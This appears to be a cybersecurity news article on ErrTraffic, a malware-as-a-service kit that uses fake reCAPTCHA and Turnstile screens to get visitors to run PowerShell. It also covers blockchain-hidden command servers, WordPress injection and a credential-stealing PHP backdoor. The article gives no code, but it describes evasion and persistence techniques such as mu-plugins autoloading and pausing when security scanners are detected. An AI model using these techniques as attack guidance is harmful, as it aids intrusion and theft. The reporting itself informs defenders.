ErrTraffic MaaS Uses Fake reCAPTCHA and Cloudflare Turnstile Lures to Execute PowerShell Commands

A new and rapidly growing cybercrime tool called ErrTraffic is making waves across the threat landscape, targeting internet users through cleverly disguised verification screens. The framework tricks victims into running malicious PowerShell commands on their own machines, all while believing they are simply completing a routine security check. It first appeared in late 2025 and has since grown into a full Malware-as-a-Service operation that allows cybercriminals to rent the tool and deploy their own attacks against a wide range of targets.

ErrTraffic works by injecting a harmful JavaScript snippet into legitimate but compromised WordPress websites. When an unsuspecting visitor lands on one of these pages, they are shown a fake verification screen that closely mimics trusted services like Google reCAPTCHA or Cloudflare Turnstile. The victim is prompted to press a keyboard shortcut, which secretly executes a PowerShell command that has already been quietly loaded into their clipboard by the malicious background script.

Analysts at Sekoia said in a report shared with Cyber Security News (CSN) that ErrTraffic is built on the ClickFix social engineering tactic and uses a technique called EtherHiding to conceal its command-and-control infrastructure inside Polygon blockchain smart contracts. This design makes it significantly harder for security tools to detect and block malicious traffic, since the attacker infrastructure can be rotated without redeploying code.

The tool is sold by a threat actor operating under the handle LenAI on the cybercrime forum Exploit.IN and through Telegram. Pricing climbed throughout 2026, with monthly subscriptions rising from $300 to $380 and source code prices jumping from $1,500 in January to $4,500 with lifetime updates included. The steep pricing reflects both the framework's effectiveness and its growing reputation within underground criminal communities.

Security researchers identified two distinct ErrTraffic clusters, named "Analytics" and "Beer," each running separate infrastructure and delivering different malware families including Vidar, Stealc, Remus, Salat, SmokeLoader, and various remote access tools. Some WordPress sites were found infected by both clusters simultaneously, pointing to competition and operational overlap between the multiple threat actors leveraging this framework.

The infection chain begins the moment a visitor loads a compromised WordPress page. A hidden JavaScript payload, encoded using Base64 and XOR techniques, queries the Polygon blockchain to retrieve the active C2 server address. This rotating infrastructure model allows attackers to swap servers daily without modifying the thousands of infected websites already hosting their injected code. Once the C2 address is resolved, the script loads the ClickFix lure through API endpoints such as /cf.js or /api/css.js, depending on the active cluster.

Attackers also impersonate legitimate AI platforms to extend ErrTraffic's reach. Malicious websites posing as Google Antigravity and ChatGPT were used to deliver the same ClickFix lure, targeting users searching for AI software. These campaigns are believed to be spread via malvertising, allowing them to reach victims entirely outside the compromised WordPress ecosystem. After gaining entry to a WordPress site through stolen administrator credentials, attackers deploy a PHP backdoor named session-manager.php inside the mu-plugins directory, where WordPress automatically loads it without any manual activation. The implant harvests login credentials by intercepting authentication requests, skims WooCommerce order data in a server-side Magecart-style attack, and provides a webshell for remote code execution. To avoid detection, the backdoor monitors incoming User-Agent strings for signatures belonging to tools like Wordfence and Nikto, then pauses all malicious behavior for thirty minutes when those tools are identified.